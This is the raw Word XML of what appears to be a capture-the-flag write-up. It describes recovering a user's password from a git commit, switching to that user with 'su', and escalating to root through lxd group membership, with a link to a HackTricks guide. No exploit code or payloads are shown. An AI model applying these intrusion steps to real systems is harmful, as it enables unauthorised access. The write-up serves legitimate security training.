          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.git</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory. Running </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git log </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we identified the commit: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">d450d3dc19695e03ca971454146f9c6ffa745c28 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with the message </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">update config.php. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upon reviewing this commit, we found the password of the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">eliot</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, allowing us to proceed further.</w:t>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19200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="52"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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">eliot’s </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">password, we used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su eliot o</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nce inside the user’s home directory, we found the first flag.</w:t>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16000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="67"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we identified that the user belongs to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lxd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> group. With this association, it is possible to escalate privileges by mounting the root filesystem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inside a container using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lxd </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">group, allowing elevated access or execution of commands with administrative privileges.</w:t>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11200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="66"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perform the exploitation, we followed the steps described in the article below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId47">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://hacktricks.boitatech.com.br/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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76"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98600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="71"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5943600" cy="14986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59"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943600" cy="18161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206500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="79"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following the described steps, we successfully obtained the final flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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headerReference r:id="rId52" w:type="default"/>
      <w:headerReference r:id="rId53" w:type="first"/>
      <w:headerReference r:id="rId54" w:type="even"/>
      <w:footerReference r:id="rId55" w:type="default"/>
      <w:footerReference r:id="rId56" w:type="first"/>
      <w:footerReference r:id="rId5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F">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-866771</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>95250</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="719138" cy="232221"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="78" name="image41.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image4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0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7820025" cy="10085729"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="43"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-339720</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5776596</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6677025" cy="3000910"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="40"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Claim</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-339720</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5776596</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6677025" cy="3000910"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="40" name="image43.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image43.png"/>
                      <pic:cNvPicPr preferRelativeResize="0"/>
                    </pic:nvPicPr>
                    <pic:blipFill>
                      <a:blip r:embed="rId2"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </pic:blipFill>
                    <pic:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6677025" cy="300091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2.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.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21.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hacktricks.boitatech.com.br/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation" TargetMode="External"/><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7.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.crowsec.com.br/desserializacao-insegura-em-net-core/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://urlencode.org/" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://jwt.io/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dnSpy/dnS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3.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NHPe93gF4Z7y0mUr93m1v7pdNw==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLjZnanl5Znd5aXUwMjIOaC50cWx2b25hZG13c2IyDmguNnBtdXJ2MWE5NHo3Mg5oLmdhaDF3Y2I3bmdrODIOaC51YXF5NWdlcXRmd3MyDmguNnVqbm53YndyOGllMg5oLmpod3JrOTZvZzZkcDIOaC4xMG8wa2xqbnlnZXoyDmguMTc1ZjVjczk0ejBvOAByITFWREVNSkRhcnExNmtua1VZQVl3Zk15VGhJbjJmLXo1Mw==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